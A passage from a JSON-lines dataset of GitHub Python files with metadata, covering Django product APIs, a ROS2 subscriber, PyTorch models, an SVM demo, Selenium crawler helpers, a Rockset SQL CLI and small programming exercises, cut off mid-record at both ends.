pd.DataFrame(date_price_list)\n","repo_name":"msen92/personal_investment_insights","sub_path":"pipelines/extraction/scraping/altinin_scraper.py","file_name":"altinin_scraper.py","file_ext":"py","file_size_in_byte":1609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"4323031848","text":"\"\"\"\nSegments Module\n----\n- Manages operation of segmented displays\n---\n\"\"\"\n\nfrom controller import communication as comm\n\ndef transmit_text(text: str):\n \"\"\"transmits text to segmented display\"\"\"\n comm.transmit(\"t\"+text, comm.ser_score)\n\ndef transmit_score(score: int):\n \"\"\"transmits score to segmented display\"\"\"\n data = \"\"\n if score == 0:\n data = \" \"\n else:\n data = str(score)\n length = len(data)\n if length < 8:\n data = \" \"*(8-length) + data\n comm.transmit(\"s\"+data, comm.ser_score)\n","repo_name":"Hydrantz/leds_screen","sub_path":"leds_screen/screen/segmented.py","file_name":"segmented.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"38403914215","text":"\nimport rclpy\nfrom rclpy.node import Node\nfrom rclpy.qos import QoSProfile\nfrom std_msgs.msg import String\n\n\nclass HelloworldSubscriber(Node):\n\n def __init__(self):\n super().__init__('Helloworld_subscriber')\n qos_profile = QoSProfile(depth=10)\n self.helloworld_subscriber = self.create_subscription(\n String,\n 'helloworld',\n self.subscribe_topic_message,\n qos_profile)\n\n def subscribe_topic_message(self, msg):\n self.get_logger().info('Received message: {0}'.format(msg.data))\n\n\ndef main(args=None):\n rclpy.init(args=args)\n node = HelloworldSubscriber()\n try:\n rclpy.spin(node)\n except KeyboardInterrupt:\n node.get_logger().info('Keyboard Interrupt (SIGINT)')\n finally:\n node.destroy_node()\n rclpy.shutdown()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"benthebear93/Smallstep_mobile_manipulator","sub_path":"ssmm_core/ssmm_core/helloworld_subscriber.py","file_name":"helloworld_subscriber.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"16"} +{"seq_id":"20944254019","text":"from datetime import datetime\nimport xarray as xr\n\nfrom cfxarray.attributes import (\n LatitudeAttrs,\n LongitudeAttrs,\n DepthAttrs,\n TimeAttrs,\n)\nfrom typing import List\nfrom dataclasses import asdict, dataclass\nfrom functools import partial\nfrom cfxarray.dims import DEPTH, DIMLESS\nfrom cfxarray.base import dataset\n\n@dataclass\nclass DepthCoords:\n depth: xr.Variable\n time: xr.Variable\n longitude: xr.Variable\n latitude: xr.Variable\n\n\ndef depthcoords(\n depth: List[float],\n time: datetime,\n longitude: float,\n latitude: float,\n):\n return asdict(\n DepthCoords(\n depth=xr.Variable(DEPTH, depth, asdict(DepthAttrs())),\n time=xr.Variable(DIMLESS, time, asdict(TimeAttrs())),\n longitude=xr.Variable(DIMLESS, longitude, asdict(LongitudeAttrs())),\n latitude=xr.Variable(DIMLESS, latitude, asdict(LatitudeAttrs())),\n )\n )\n\nprofiledataset = partial(dataset, \"profile\", \"profile_name\")\n","repo_name":"NIVANorge/s-enda-playground","sub_path":"hello-xarray/cfxarray/profile.py","file_name":"profile.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"4916523952","text":"from django.shortcuts import render\nfrom store.serializers import ProduitSerializer\nfrom rest_framework.decorators import api_view, permission_classes\nfrom rest_framework.permissions import IsAuthenticated, IsAdminUser\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom store.models import Produit,Categorie\nfrom django.shortcuts import render,get_object_or_404\nfrom rest_framework import status\nfrom datetime import datetime\n\n\n@api_view(['GET'])\ndef getProduits(request):\n query = request.query_params.get('keyword')\n if query == None:\n query = ''\n\n produits = Produit.objects.filter(\n nom__icontains=query).order_by('-date_creation')\n\n page = request.query_params.get('page')\n paginator = Paginator(produits, 5)\n\n try:\n produits = paginator.page(page)\n except PageNotAnInteger:\n produits = paginator.page(1)\n except EmptyPage:\n produits = paginator.page(paginator.num_pages)\n\n if page == None:\n page = 1\n\n page = int(page)\n print('Page:', page)\n serializer = ProduitSerializer(produits, many=True)\n return Response({'produits': serializer.data, 'page': page, 'pages': paginator.num_pages})\n \nclass ProduitDetails(APIView):\n def get(self,request,pk):\n produit=get_object_or_404(Produit,pk=int(pk))\n data=ProduitSerializer(produit).data\n return Response(data)\n\n\nclass Promo(APIView):\n def get(self,request):\n \n produits=Produit.objects.filter(promotion=True)\n\n page = request.query_params.get('page')\n paginator = Paginator(produits, 5)\n\n try:\n produits = paginator.page(page)\n except PageNotAnInteger:\n produits = paginator.page(1)\n except EmptyPage:\n produits = paginator.page(paginator.num_pages)\n\n if page == None:\n page = 1\n\n page = int(page)\n print('Page:', page)\n serializer = ProduitSerializer(produits, many=True)\n return Response({'produits': serializer.data, 'page': page, 'pages': paginator.num_pages})\n\n@api_view(['GET'])\ndef getNouveau(request):\n produits = Produit.objects.all().order_by('-date_creation')[0:5]\n serializer = ProduitSerializer(produits, many=True)\n return Response(serializer.data)\n\n@api_view(['POST'])\n@permission_classes([IsAdminUser])\ndef ajouterProduit(request):\n data=request.data\n categorie=Categorie.objects.get(name=data['categorie'])\n produit = Produit.objects.create(\n nom=data['nom'],\n ref=data['ref'],\n description=data['description'],\n categorie=categorie ,\n marque=data['marque'],\n tva=data['tva'],\n promotion=data['promotion'],\n prix=data['prix'],\n prix_promo=data['prix_promo'],\n commentaire=data['commentaire'],\n \n )\n\n serializer = ProduitSerializer(produit, many=False)\n return Response(serializer.data)\n\n\n@api_view(['PUT'])\n@permission_classes([IsAdminUser])\ndef modifierProduit(request, pk):\n data = request.data\n\n produit = Produit.objects.get(id=str(pk))\n serializer = ProduitSerializer(produit, data=data)\n\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n@api_view(['DELETE'])\n@permission_classes([IsAdminUser])\ndef supprimerProduit(request, pk):\n produit = Produit.objects.get(id=int(pk))\n produit.delete()\n return Response('Produit Supprimé')\n\n@api_view(['POST'])\ndef uploadImage(request):\n data = request.data\n\n produit_id = data['id']\n produit = Produit.objects.get(id=int(produit_id))\n\n produit.image = request.FILES.get('image')\n produit.save()\n\n return Response('Image was uploaded')\n\n@api_view(['GET'])\ndef getProm(request):\n produits=Produit.objects.filter(promotion=True)\n serializer = ProduitSerializer(produits, many=True)\n return Response(serializer.data)\n","repo_name":"SMJB4015/EPI-BACKEND","sub_path":"store/views/produit_views.py","file_name":"produit_views.py","file_ext":"py","file_size_in_byte":4057,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"74293668489","text":"# Задание-4.\n#\n# Описание:\n#\n# 4. Начните работу над проектом «Склад оргтехники».\n# Создайте класс, описывающий склад.\n# А также класс «Оргтехника», который будет базовым для классов-наследников.\n# Эти классы — конкретные типы оргтехники (принтер, сканер, ксерокс).\n# В базовом классе определить параметры, общие для приведенных типов.\n# В классах-наследниках реализовать параметры, уникальные для каждого типа оргтехники.\n#\n# .\n\n\n\"\"\n\nfrom abc import ABC, abstractmethod\n\nclass InitClass:\n склад_номер = str\n размещение_ряд = int\n размещение_полка = str\n размещение_место= int\n серийный_номер = int\n производитель_наименование = str\n производитель_страна = str\n бренд_наименование = str\n поставщик_наименование = str\n\n\nclass Warehouse(ABC):\n\n @abstractmethod\n def storehouse(self):\n pass\n\n\nclass Printer(Warehouse,InitClass):\n def __init__(self):\n self.тип_принтера = [\"струйный\",\"лазерный\",\"матричны\",\"3D-принтер\"]\n self.модель_номер = str\n self.модель_наименование = str\n\nclass Scaner(Warehouse,InitClass):\n def __init__(self):\n self.тип_сканера = [\"ручной\",\"планшетный\",\"потоковый\",\"сканер_штрих_код\"]\n self.модель_номер = str\n self.модель_наименование = str\n\nclass Xerox(Warehouse,InitClass):\n def __init__(self):\n self.тип_ксерокса = [\"портативный\",\"Лазерный_МФУ\",\"Струйный_МФУ\"]\n self.модель_номер = str\n self.модель_наименование = str\n\n\n","repo_name":"YRQbit/GBPython","sub_path":"lesson_8/example_4_v1.py","file_name":"example_4_v1.py","file_ext":"py","file_size_in_byte":2159,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"48075507840","text":"# You are given the root of a binary tree. Find the level for the binary tree with the\n# minimum sum, and return that value.\n\n# For instance, in the example below, the sums of the trees are 10, 2 + 8 = 10, and\n# 4 + 1 + 2 = 7. So, the answer here should be 7.\n\nclass Node:\n def __init__(self, value, left=None, right=None):\n self.val = value\n self.left = left\n self.right = right\n\n\ndef minimum_level_sum(root, level):\n if root.left:\n minimum_level_sum(root.left, level+1)\n if root.right:\n minimum_level_sum(root.right, level+1)\n if level in score:\n score[level] += root.val\n else:\n score[level] = root.val\n\n if level == 0:\n print(score[min(score, key=score.get)])\n\n\n# 10\n# / \\\n# 2 8\n# / \\ \\\n# 4 1 2\nnode = Node(10)\nnode.left = Node(2)\nnode.right = Node(8)\nnode.left.left = Node(4)\nnode.left.right = Node(1)\nnode.right.right = Node(2)\n\nscore = {}\n\nminimum_level_sum(node, 0)\n","repo_name":"Agrotir/Python-Practice","sub_path":"Binary Tree Level with Minimum Sum/Binary_Tree_Level_with_Minimum_Sum.py","file_name":"Binary_Tree_Level_with_Minimum_Sum.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"13989918158","text":"import math\nfrom collections import OrderedDict\nimport torch\nfrom torch import nn\nfrom einops import rearrange, repeat\nfrom einops.layers.torch import Rearrange, Reduce\n\nfrom ._core_fes import dict_fes\n\n\nclass MRCnnFc(nn.Module):\n def __init__(self, config, path_weights):\n super(MRCnnFc, self).__init__()\n self.config = config\n if self.config[\"debug\"]:\n print(\"Config at model init\", self.config)\n self.vs = dict()\n\n t_fe = dict_fes[self.config[\"fe\"][\"arch\"]](\n pretrained=self.config[\"fe\"][\"pretrained\"])\n if self.config[\"fe\"][\"with_gap\"]:\n # Exclude trailing FC layer\n t_fe = list(t_fe.children())[:-1]\n else:\n # Exclude trailing GAP and FC layers\n t_fe = list(t_fe.children())[:-2]\n self._fe = nn.Sequential(*t_fe)\n\n if self.config[\"fe\"][\"dropout\"]:\n self._fe_drop = nn.Dropout2d(p=self.config[\"fe\"][\"dropout\"])\n else:\n self._fe_drop = nn.Identity()\n\n if self.config[\"debug\"]:\n print(\"FE submodel\", self._fe)\n\n self.vs[\"num_slices\"] = self.config[\"input_size\"][0][2]\n if self.config[\"downscale\"]:\n self.vs[\"num_slices\"] = round(self.vs[\"num_slices\"] *\n self.config[\"downscale\"][0][2])\n\n if self.config[\"fe\"][\"arch\"] in (\"resnet18\", \"resnet34\"):\n self.vs[\"fe_out_ch\"] = 512\n elif self.config[\"fe\"][\"arch\"] == \"resnet50\":\n self.vs[\"fe_out_ch\"] = 2048\n else:\n raise ValueError(f\"Unsupported `model.fe.arch`\")\n\n if self.config[\"fe\"][\"with_gap\"]:\n self.vs[\"fe_out_spat\"] = (1, 1)\n else:\n if self.config[\"input_size\"][0][0] == 320:\n self.vs[\"fe_out_spat\"] = (5, 5)\n else:\n msg = \"Unspecified `model.fe` output shape for given `model.input_size`\"\n raise ValueError(msg)\n\n if self.config[\"agg\"][\"kind\"] == \"concat\":\n self._agg = nn.Sequential(*[\n Rearrange(\"(b s) ch d0 d1 -> b (s ch d0 d1)\", s=self.vs[\"num_slices\"]),\n nn.Linear(self.vs[\"num_slices\"] *\n self.vs[\"fe_out_ch\"] *\n math.prod(self.vs[\"fe_out_spat\"]),\n self.config[\"agg\"][\"hidden_size\"]),\n nn.ReLU(),\n nn.Dropout(self.config[\"agg\"][\"dropout\"]),\n ])\n\n self._agg_fc = nn.Linear(self.config[\"agg\"][\"hidden_size\"],\n self.config[\"output_channels\"])\n elif self.config[\"agg\"][\"kind\"] == \"avg_pool\":\n self._agg = nn.Sequential(*[\n Rearrange(\"(b s) ch d0 d1 -> b s ch d0 d1\", s=self.vs[\"num_slices\"]),\n Reduce(\"b s ch d0 d1 -> b ch d0 d1\", reduction=\"mean\"),\n Rearrange(\"b ch d0 d1 -> b (ch d0 d1)\"),\n nn.Dropout(self.config[\"agg\"][\"dropout\"]),\n ])\n\n self._agg_fc = nn.Linear(self.vs[\"fe_out_ch\"] *\n math.prod(self.vs[\"fe_out_spat\"]),\n self.config[\"output_channels\"])\n else:\n raise ValueError(f\"Unsupported `model.agg.kind`\")\n\n if self.config[\"restore_weights\"]:\n self.load_state_dict(torch.load(path_weights))\n\n def _debug_tensor_shape(self, tensor, name=\"\"):\n if self.config[\"debug\"]:\n print(f\"Shape of {name} is\", tensor.size())\n\n def forward(self, input):\n \"\"\"\n input : (B, CH, R, C, S)\n\n Notes:\n B - batch, CH - channel, R - row, C - column, S - slice/plane, F - feature\n \"\"\"\n endpoints = OrderedDict()\n\n self._debug_tensor_shape(input, \"input\")\n\n tmp_in = rearrange(input, \"b ch r c s -> (b s) ch r c\")\n tmp_in = repeat(tmp_in, \"bs ch r c -> bs (k ch) r c\", k=3)\n self._debug_tensor_shape(tmp_in, \"proc in\")\n\n res_fe = self._fe(tmp_in)\n self._debug_tensor_shape(res_fe, \"FE out\")\n\n res_agg = self._agg(res_fe)\n self._debug_tensor_shape(res_agg, \"AGG out\")\n\n res_out = self._agg_fc(res_agg)\n self._debug_tensor_shape(res_out, \"AGG FC out\")\n\n endpoints[\"main\"] = res_out\n return endpoints\n","repo_name":"Oulu-IMEDS/OAProgressionMR","sub_path":"oaprmr/models/_mr_cnn_fc.py","file_name":"_mr_cnn_fc.py","file_ext":"py","file_size_in_byte":4306,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"16"} +{"seq_id":"41231749820","text":"import random\n\nimport numpy as np\n\nfrom model.support_vector_machine import Support_Vector_Machine\nfrom utils.utils import read_data\nfrom model.kernel_func import Poly_Kernel\nimport model.kernel_func as kf\nfrom utils.draw import draw_div_line\n\n\ndef generate_data():\n with open('../data/data.csv', 'w') as fd:\n for _ in range(0, 100):\n x = random.random() * 10\n y = random.random() * 10\n if y > 0.8 * x * x - 7.2 * x + 19:\n label = 0\n fd.write(str(x) + ',' + str(y) + ',' + str(label) + '\\n')\n elif y < 0.8 * x * x - 7.2 * x + 15:\n label = 1\n fd.write(str(x) + ',' + str(y) + ',' + str(label) + '\\n')\n\n with open('../data/test.csv', 'w') as fd:\n for _ in range(0, 100):\n x = random.random() * 10\n y = random.random() * 10\n if y > 0.8 * x * x - 7.2 * x + 19:\n label = 0\n fd.write(str(x) + ',' + str(y) + ',' + str(label) + '\\n')\n elif y < 0.8 * x * x - 7.2 * x + 15:\n label = 1\n fd.write(str(x) + ',' + str(y) + ',' + str(label) + '\\n')\n\n\ndef run_svm():\n svm = Support_Vector_Machine(max_round=20, kernel_func=kf.Gauss_Kernel(sigma=1))\n data, label, dtype = read_data(\"../data/data.csv\", \"../data/type.csv\")\n\n svm.train(data, label)\n\n label = np.array([-1 if i == 0 else 1 for i in label])\n draw_div_line(data, label, min_x=-5, max_x=15, min_y=-5, max_y=15, query=svm.query, sv=svm.sv)\n t_data, t_label, dtype = read_data(\"../data/test.csv\", \"../data/type.csv\")\n cnt = 0\n for x, y in zip(t_data, t_label):\n out = svm.query(x)\n print('query sample : {} - {}'.format(x, y))\n if y == 0 and out < 0:\n cnt += 1\n print(' out {} RIGHT!!!\\n'.format(out))\n elif y == 1 and out > 0:\n cnt += 1\n print(' out {} RIGHT!!!\\n'.format(out))\n else:\n print(' out {} WRONG!!!\\n'.format(out))\n print('query done! right : {}, total : {}, acc : {}\\n'.format(cnt, t_label.shape[0], cnt / t_label.shape[0]))\n\n\nif __name__ == '__main__':\n # generate_data()\n data, label, dtype = read_data(\"../data/data.csv\", \"../data/type.csv\")\n label = np.array([-1 if i == 0 else 1 for i in label])\n draw_div_line(data, label, -5, 15, -5, 15)\n run_svm()\n","repo_name":"Kalzncc/MachineLearningImpl","sub_path":"svm/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"33441149267","text":"from __future__ import annotations\n\nfrom logging import getLogger\nfrom multiprocessing import Queue\nfrom typing import Any, List, Union, cast\n\nfrom dealwebpage.webpage import Page\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.firefox.webdriver import WebDriver\nfrom selenium.webdriver.support import expected_conditions\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom utils.logger import worker_configurer\n\nlogger = getLogger(__name__)\n\ndef configure_logger_for_use_extentions(queue_log: Queue[Any]):\n \"\"\"\n Loggerをセット\n logger の使い方が正しくないがゆえにここでセットしないといけない\n \"\"\"\n worker_configurer(queue_log, logger)\n\ndef get_watcher_window(driver: WebDriver, wait: WebDriverWait) -> Union[bool, int, str]:\n \"\"\"\n driverを取得した直後に呼ぶ\n Watcherタブ以外を消してWatcherタブを開く\n \"\"\"\n watcher_window = False\n logger.debug(\"Try to access extension page\")\n try:\n wait.until(expected_conditions.visibility_of_all_elements_located((By.ID, \"button\")))\n wait.until(expected_conditions.presence_of_element_located((By.ID, \"DoneAttachJS\")))\n except TimeoutException as err:\n print(f\"failed to access extension page by timeout: {err}\")\n return False\n except Exception as err:\n print(f'failed to access extension page: {err}')\n return False\n\n try:\n windows: list[Union[int, str]] = driver.window_handles\n for window in windows:\n driver.switch_to.window(window)\n title = driver.title\n if title == \"Watcher\":\n watcher_window = window\n else:\n # 不要なページを消す\n driver.close()\n except Exception as err:\n # 最悪、エラーが起きてもwatcher_windowがわかればよい\n pass\n\n try:\n driver.switch_to.window(watcher_window)\n except Exception as err:\n logger.exception(f\"Faild to switch extension page: {err}\")\n return False\n else:\n return watcher_window\n\ndef stop_watcher_and_get_data(driver: WebDriver, wait: WebDriverWait, watcher_window: Union[str, int], page: Page) -> bool:\n \"\"\"\n Watcher.htmlのStop Watchingボタンをクリック。\n 拡張機能が監視を終え、収集したデータを記録。\n \"\"\"\n logger.debug(\"Watcher: stop\")\n try:\n # watcher.htmlに移動してstopをクリック\n # クリックすると、Watcher.htmlのdivタグ(id=\"contents\")の中に、収集したデータを記録する\n driver.switch_to.window(watcher_window)\n wait.until(expected_conditions.visibility_of_element_located((By.ID, \"stop\")))\n elm = driver.find_element_by_id(\"stop\")\n elm.click()\n\n # contentsの最後の要素がDOMに現れるまで待つ\n wait.until(expected_conditions.presence_of_element_located((By.ID, \"EndOfData\")))\n\n # watcher.htmlのHTMLをpageインスタンスのプロパティに保存\n page.watcher_html = driver.page_source # type: ignore\n\n # clearContentsをクリック\n elm: Any = driver.find_element_by_id(\"clearContents\")\n elm.click()\n # 最後の要素が消えるまで待つ\n wait.until(expected_conditions.invisibility_of_element_located((By.ID, \"EndOfData\")))\n except Exception as err:\n logger.exception(f'{err}')\n return False\n else:\n logger.debug(\"Watcher: Get data from Watcher\")\n return True\n\n\ndef start_watcher_and_move_blank(driver: WebDriver, wait: WebDriverWait, watcher_window: Union[int, str], blank_window: str) -> bool:\n \"\"\"\n watcher.htmlのStart Watchingボタンをクリック。拡張機能が監視を始める\n \"\"\"\n logger.debug(\"Watcher: starting...\")\n try:\n driver.switch_to.window(watcher_window)\n wait.until(expected_conditions.visibility_of_element_located((By.ID, \"start\")))\n elm: Any = driver.find_element_by_id(\"start\")\n elm.click()\n driver.switch_to.window(blank_window)\n wait.until(lambda d: \"Watcher\" != driver.title) # type: ignore\n except Exception as err:\n logger.exception(f'{err}')\n return False\n else:\n return True\n\n\ndef rm_other_than_watcher(driver: WebDriver, wait: WebDriverWait, watcher_window: Union[str, int]) -> Union[int, str]:\n \"\"\"\n Watcherタブ以外を消してWatcherタブを開く\n \"\"\"\n logger.debug(\"rm_other_than_watcher...\")\n\n try:\n windows = driver.window_handles\n except Exception as err:\n logger.exception(f\"{err}\")\n return watcher_window\n\n windows = cast(List[Union[int, str]], windows)\n for window in windows:\n driver.switch_to.window(window)\n title = driver.title\n if title == \"Watcher\":\n watcher_window = window\n else:\n try:\n # 不要なページを消す\n logger.info(\"close some window\")\n driver.close()\n except Exception as err:\n logger.exception(f\"failed to close window {err}\")\n pass\n\n try:\n driver.switch_to.window(watcher_window)\n except Exception as err:\n logger.exception(f\"Faild to switch extension page: {err}\")\n pass\n\n logger.debug(\"rm_other_than_watcher... FIN\")\n return watcher_window\n","repo_name":"cysec-lab/crawler","sub_path":"src/webdrivers/use_extentions.py","file_name":"use_extentions.py","file_ext":"py","file_size_in_byte":5461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"6417906918","text":"\"\"\"Contains a Scraper objects that feed the list of crypto coins to the application\"\"\"\nimport configparser\n\nimport requests\nfrom bs4 import BeautifulSoup\n\n\ndef extract_name(full_name: str, symbol: str) -> str:\n \"\"\"Due to the fact that the web page provides names that are combined with symbol name\n (without space in between), this function helps to extract the actual name of the coin\n based on the symbol string\"\"\"\n return full_name[len(symbol):]\n\n\nclass Scraper:\n\n def __init__(self):\n config = configparser.ConfigParser()\n config.read(\"config.ini\")\n self.url = config[\"scraper\"][\"url\"]\n\n self.soup = BeautifulSoup(self._get_html_text(), 'lxml')\n\n def _get_html_text(self):\n r = requests.get(self.url)\n\n return r.text\n\n def scrape_coin_names(self) -> list:\n result = []\n table = self.soup.find(\"tbody\")\n rows = table.find_all(\"tr\")\n for row in rows:\n cells = row.find_all(\"td\")\n full_name = cells[1].text\n symbol_str = cells[2].text\n name = extract_name(full_name, symbol_str)\n result.append(name)\n\n return result\n\n\n\n\n","repo_name":"AleksanderWWW/crypto_app","sub_path":"api_client/coinmarket_scraper.py","file_name":"coinmarket_scraper.py","file_ext":"py","file_size_in_byte":1174,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"10105950900","text":"from .command_auth import AuthCommand\nfrom rockset.query import QueryStringSQLText\nimport sys\nimport time\n\n\nclass SQLQuery(AuthCommand):\n def usage(self):\n return \"\"\"\nusage: rock sql --help\n rock sql\n rock sql <sql_statement> [<args>...]\n\nRun a sql query and return results as documents.\n\narguments:\n <sql-statement> sql query to run; will read from STDIN if == '-'\n\nexamples:\n\n # To enter into the rock SQL REPL\n $ rock sql\n\n # To run a simple SQL query\n $ rock sql 'SELECT * from my_collection LIMIT 10'\n\n # To supply SQL from STDIN, use \"-\"\n $ echo 'SELECT * from my_collection LIMIT 10' | rock sql -\n\n \"\"\"\n\n def validate_args(self, pargs):\n allowed_args = ['drop_results']\n for arg in pargs['<args>']:\n if arg not in allowed_args:\n return False\n return True\n\n def go(self):\n if not self.sql_statement:\n try:\n from rockset_sqlcli.rscli.main import cli_main\n except (ImportError, FileNotFoundError) as e:\n raise ImportError(\n 'Python package rockset_sqlcli is not installed. '\n 'Please run `pip3 install rockset_sqlcli` and try again!'\n )\n return cli_main(\n api_server=self.api_server,\n api_key=self.api_key,\n workspace='commons',\n generate_warnings=self.warn,\n )\n elif self.sql_statement == '-':\n self.sql_statement = self.read_stdin('SQL query')\n q = QueryStringSQLText(self.sql_statement)\n\n # lets do this\n start = time.time()\n cursor = self.client.sql(q=q, generate_warnings=self.warn)\n\n results = cursor.results()\n warnings = cursor.warnings()\n fields = cursor.fields() or []\n elapsed = round(1000 * (time.time() - start))\n if self.warn and warnings is not None:\n self.wprint(warnings)\n if 'drop_results' in self.args:\n print(\n 'Query returned {} rows in {}ms'.format(len(results), elapsed)\n )\n else:\n self.print_list(0, results, field_order=[f['name'] for f in fields])\n\n return 0\n","repo_name":"gadhagod/rockset-python","sub_path":"rockset/rock/commands/sqlquery.py","file_name":"sqlquery.py","file_ext":"py","file_size_in_byte":2239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"24641602430","text":"\n\"\"\"\nyil = 2022\ntoplam = 0\nwhile True:\n yillikGelir = int(input(f\"{yil} yılı geliriniz?\"))\n yil += 1\n if yillikGelir == 0:\n print(\"bb\")\n break\n if yillikGelir < 32000:\n vergiOrani = 0.15\n elif yillikGelir >= 32000 or yillikGelir < 70000:\n vergiOrani = 0.20\n elif yillikGelir >= 70000 or yillikGelir < 250000:\n vergiOrani = 0.27\n elif yillikGelir >= 250000 or yillikGelir < 880000:\n vergiOrani = 0.35\n else:\n vergiOrani = 0.40\n if yil == 2027:\n break\n # print(f\"Verginiz {yillikGelir*vergiOrani} TL'dir.\")\n toplam += (yillikGelir*vergiOrani)\nprint(f\"5 yıllık ödediğiniz gelirler vergisi toplamınız {toplam} TL'dir. \")\n\n\"\"\"\n\n#Vücüt kitle indeksi\n#vki = kg/m*m\nwhile True:\n kilo= float(input(\"Lütfen kilonuzu giriniz \\t:\"))\n boy=float(input(\"Lütfen boyunuzu giriniz \\t: \"))\n vci = kilo / ( boy**2 )\n\n if vci <18.5:\n print(\"vücüt kitle indeksi zayıf\")\n elif vci>18.5 and vci<24.9:\n print(\"ideal\")\n elif vci >25 and vci<29.9:\n print(\"şişman\") \n elif vci>34.9 and vci<30:\n print(\"obez\")\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Mert173-code/VSCode-Python","sub_path":"03_donguler.py/test4.py","file_name":"test4.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"19473846309","text":"from torch.utils.data import Dataset, DataLoader\nimport torch\nimport glob\nimport os\nimport numpy as np\nimport cv2\nfrom multiprocessing import Pool, Manager, Process\nimport torchvision.transforms as transforms\nimport argparse\nimport segmentation_models_pytorch as smp\nimport torch.cuda.amp as amp\nimport torch.nn as nn\nimport time\nimport matplotlib.pyplot as plt\n########\nfinal_start_time = time.time()\n########\nos.environ[\"CUDA_DEVICE_ORDER\"]=\"PCI_BUS_ID\"\nos.environ[\"CUDA_VISIBLE_DEVICES\"]=\"0\"\nis_print = True\npatch_size = 768\noverlap_ratio = 0.5\nmax_y = 7\nmax_x = 9\nmanager = Manager()\n# data_dict = manager.dict()\n\ndef crop_image(filename):\n overlap = 0.5\n dict = {}\n flag = False\n for origin_filename in filename:\n origin_image = cv2.imread(origin_filename)\n filename_only = origin_filename.split(\"/\")[-1].split(\".\")[0]\n x_list = [i for i in range(0, len(origin_image[0]), int(patch_size * (1 - overlap)))]\n y_list = [i for i in range(0, len(origin_image), int(patch_size * (1 - overlap)))]\n for idx_x, x in enumerate(x_list):\n for idx_y, y in enumerate(y_list):\n patch_image = origin_image[y:y+patch_size, x:x+patch_size, :]\n if patch_image.shape != (patch_size, patch_size, 3):\n h, w, c = patch_image.shape\n if not flag:\n zeros = np.zeros((patch_size, patch_size, 3), dtype=np.uint8)\n flag = True\n else:\n zeros[:,:,:] = 0\n zeros[:h, :w, :] = patch_image\n patch_image = zeros.copy()\n dict[filename_only+\"_\"+str(idx_x)+\"_\"+str(idx_y)] = patch_image\n return dict\n\ndef save_image(save_folder, file_names, images):\n for filename, image in zip(file_names, images):\n cv2.imwrite(os.path.join(save_folder, filename), image[:,:,::-1])\n\n\nclass TestDataset(Dataset):\n def __init__(self, folder_path):\n data_paths = glob.glob(os.path.join(folder_path, \"*.png\"))\n dict_ = crop_image(data_paths)\n self.dictionary = dict(dict_)\n self.path_list = sorted(list(self.dictionary.keys()))\n self.transform = transforms.ToTensor()\n\n def __len__(self):\n return len(self.path_list)\n\n def __getitem__(self, index):\n ret_path = self.path_list[index]\n ret_img = self.dictionary[ret_path]\n\n y = int(ret_path.split(\"_\")[-1])\n x = int(ret_path.split(\"_\")[-2])\n image_name = \"_\".join(ret_path.split(\"_\")[:-2])\n return transforms.ToTensor()(ret_img[:,:,::-1].copy()), y, x, image_name\n\n\ndef main():\n '''Parsing arguments'''\n print(\"Inference Start..\")\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--test_path\", type=str, default='./test_input_img')\n parser.add_argument(\"--save_path\", type=str, default='./best')\n parser.add_argument(\"--weight_path\", type=str, default=\"./weights_train/model_b3_full_pretrained_142(LB).pt\")\n args = parser.parse_args()\n\n os.makedirs(args.save_path, exist_ok=True)\n\n\n '''Prepare the dataset and loader'''\n db_start = time.time()\n test_dataset = TestDataset(args.test_path)\n test_loader = DataLoader(test_dataset, batch_size=21, shuffle=False, pin_memory=True, num_workers=4)\n print(\"Data Preprocessing...\", time.time()-db_start)\n '''Model Setting'''\n setup_start = time.time()\n model = smp.UnetPlusPlus(encoder_name='timm-efficientnet-b3', classes=3)\n model = nn.DataParallel(model, device_ids=[0])\n model.cuda()\n model.load_state_dict(torch.load(args.weight_path))\n\n print(\"Model Setup...\", time.time() - setup_start)\n condition = {}\n prediction_images = []\n prediction_paths = []\n model.eval()\n\n patch_making = 0\n output_patch = 0\n inference_only = 0\n sr_only = 0\n start_inf = time.time()\n with torch.no_grad():\n image = torch.zeros((3, 2448, 3264), dtype=torch.float32).cuda()\n for data in test_loader:\n input, y, x, image_name = data\n input = input.cuda()\n\n with amp.autocast():\n infer_start = time.time()\n model_prediction = model.forward(input)\n prediction = torch.clamp((input + model_prediction), 0., 1.)\n prediction = prediction * 255.0\n infer_end = time.time()\n inference_only += (infer_end - infer_start)\n\n\n for idx, 